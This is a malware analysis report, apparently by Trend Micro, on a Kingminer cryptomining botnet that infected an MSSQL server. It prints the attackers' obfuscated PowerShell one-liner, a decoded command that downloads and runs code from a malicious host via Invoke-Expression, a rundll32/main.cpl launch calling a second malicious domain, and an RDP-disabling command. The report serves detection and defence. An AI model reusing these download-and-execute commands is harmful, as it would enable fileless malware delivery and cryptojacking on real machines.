Uncovering a Kingminer Botnet Attack Using Trend Micro™ Managed XDR

Investigation and analysis

We observed a VBScript file named %PUBLIC%\gfghhjhyuq.vbs executed through sqlservr.exe. This led us to suspect that the device had been exploited through a vulnerability that allowed malicious actors to execute arbitrary codes remotely. The sqlservr process handles the requests received by an MSSQL database

Figure 2. Trend Micro Vision One™ execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs

We collected the gfghhjhyuq.vbs file using Trend Micro Vision One to probe further. Despite the script being obfuscated, we were able to uncover most of its functions by decoding the hex string parameters. We describe the chain of events in the following section.

The file first checks for the operating system version through a WMI object. It then proceeds to download a 32-bit or 64-bit payload depending on the installed Windows version.

Figure 3. Partially decoded gfghhjhyuq.vbs used to check the operating system version through a WMI object

Next, it downloads a standalone PowerShell binary from a raw file stored in a GitHub user's repository. Afterward, it saves and executes it as %PUBLIC%\{timestamp}\sysdo.exe.

Figure 4. Downloading of 32-bit or 64-bit PowerShell binary from a GitHub repository

Figure 5. PowerShell binary copied as sysdo.exe and executed

Following this, it generates the URL where additional PowerShell scripts will be downloaded. The scripts are then executed filelessly using Invoke-Expression.

Figure 6. Generating URLs for download and fileless execution of additional PowerShell scripts

Finally, it runs a cryptocurrency miner payload through a Control Panel item.

Figure 7. Execution of cryptocurrency miner through a Control Panel item

Security teams can clearly see and monitor the chain of events in Vision One. After the cryptocurrency miner is executed through the Control Panel item, sqlservr.exe calls C:\Windows\Temp\sysdo.exe (renamed as PowerShell binary).

Figure 8. Sysdo.exe (renamed as a PowerShell binary) executing the following obfuscated commands directly to memory, detected as Trojan.PS1.MALXMR.PFAIS

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$p='b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafba5b9cfdadbdfc3c3c7acb3f8b9d8e7f2f9bfb0d0d2c3b0bbb0ffe3e3e7adb8b8e0e0b9a4a6a6a4f4f1f3f6f2b9f4f8fab8f2f5b9e3efe3b0bbb7b3d1f6fbe4f2beacb3f8b9c4f2f9f3bfbeacb3e7aab3f8b9e5f2e4e7f8f9e4f2c3f2efe3acccc4eee4e3f2fab9c3f2efe3b9d2f9f4f8f3fef9f0caadadd6e4f4fefeb9d0f2e3c4e3e5fef9f0bfccd4f8f9e1f2e5e3caadadd1e5f8fad5f6e4f2a1a3c4e3e5fef9f0bfb3e7bebeebb1bfd0d6dbb7debdcfbeacf9f2feb7b7bac7d2c7f6e3ffb7f1f1f1f1b7baf9fef4b7e3fc';$p = for($i=0; $i -lt $p.length; $i+=2){[char](([byte][char][int]::Parse($p.substring($i,2),'HexNumber')) -bxor 151)};$p=(-join $p) -join ' ';$p|&(GAL I*X)"

Upon checking the Windows Antimalware Scan Interface (AMSI) telemetry through Vision One, we saw the decoded PowerShell command lines. These connect to http://ww[.]3113cfdae.com/eb[.]txt th

$o = New-Object -ComObject Msxml2.XMLHTTP;$o.Open('GET','http://ww.3113cfdae.com/eb.txt', $False);$o.Send();$p=$o.responseText;[System.Text.Encoding]::Ascii.GetString([Convert]::FromBase64String($p))|&(GAL I*X);nei -PEPath ffff -nic tk

Similar to what we saw in our analysis of the file gfghhjhyuq.vbs script, it has also been observed through Vision One that sysdo.exe invoked rundll32 using a main.cpl, which is a Microsoft Module for the functionality of the mouse. The malicious actor used this module to launch the payload directly onto the device's memory that connects to known malicious domain, http://qqqe[.]1eaba4fdae[.]com, to download additional components.

"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl" -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl" -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99I*X)"

Figure 9. Process tree of Control Panel item execution as seen in the Vision One console

We noticed additional PowerShell executions spawned by sqlservr.exe. These were executed by the previously dropped sysdo.exe file. There are two commands here: One checks if the installed version of Windows is from Windows 2000 to Windows 7. Secondly, it checks separately if hotfixes KB4499175 (Windows 7 SP1) and KB4500331 (Windows XP, Windows Server 2003 SP2) are installed. If it finds that none of the hotfixes is present, this means that it is vulnerable to the BlueKeep vulnerability assigned as CVE-2019-0708. If both commands yield negative results, the script disables RDP and the cryptocurrency miner proceeds to its infection routine.

"C:\Windows\system32\cmd.exe" /c cmd /c ver |findstr "5.0 5.1 5.2 6.0 6.1"&&wmic qfe GET hotfixid |findstr /i "kb4499175 kb4500331"||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0"C:\Windows\System32\cmd.exe" /c ver |findstr "5.0 5.1 5.2 6.0 6.1"&&wmic qfe GET hotfixid |findstr /i "kb4499175 kb4500331"||wmic RDTOGGLE WHERE ServerName='HELPDESK' call SetAllowTSConnections 0

Discovering vulnerabilities

Using a search engine for internet of things (IoT) devices like Shodan and Censys, the team was able to both see exposed services such as RDP and SQL and validate missing patches on any machine. One of the vulnerabilities we found traces back to 2014.

Figure 10. Vulnerability found through a Shodan scan on any public-facing machine

Notably, after we detected fgfghhjhyuq.vbs (detected as Trojan.VBS.MALXMR.AS), we continued to observe more attempts to drop malware on the same server. It's important to note that although the malicious actor was unable to execute the malware, such attempts did not stop since the malware was still there. Only after the vulnerability was patched did the attempts cease.

Conclusion and security recommendations

While measures for signature detection are in place to shield an organization's network from breaches, security teams should still prioritize the identification of vulnerabilities on their servers and endpoints and make sure that these are immediately patched. Doing so is even more crucial for public-facing systems. Adopting a proactive cybersecurity mindset is essential for an organization to thrive as the conduct of business in the digital space deepens and grows.

It is recommended that organizations deploy intrusion detection systems such as Trend Micro™ Deep Discovery™ Inspector) as a preventive measure. This is relevant to the case discussed here. Since we did not have network-level visibility, we only relied on endpoint-level data to investigate and respond to the threat. Implementing network monitoring allows security professionals to detect specific server-related vulnerabilities that the malicious actors might abuse, in addition to being able to scope out all affected machines on the network. A reliable intrusion detection system would also be a useful tool for monitoring and investigating ongoing attacks since it can provide historical logs of activities in an organization's network.

Indicators of compromise (IOCs)

SHA256	Detection Name
0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0	Trojan.VBS.MALXMR.AS
CB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86	Trojan.PS1.MALXMR.PFAIS

• hxxp://ww.3113cfdae.com/eb[.]txt, detected as Dangerous (Disease Vector)
• hxxp://qqqe.1eaba4fdae[.]com/, detected as Dangerous (Disease Vector)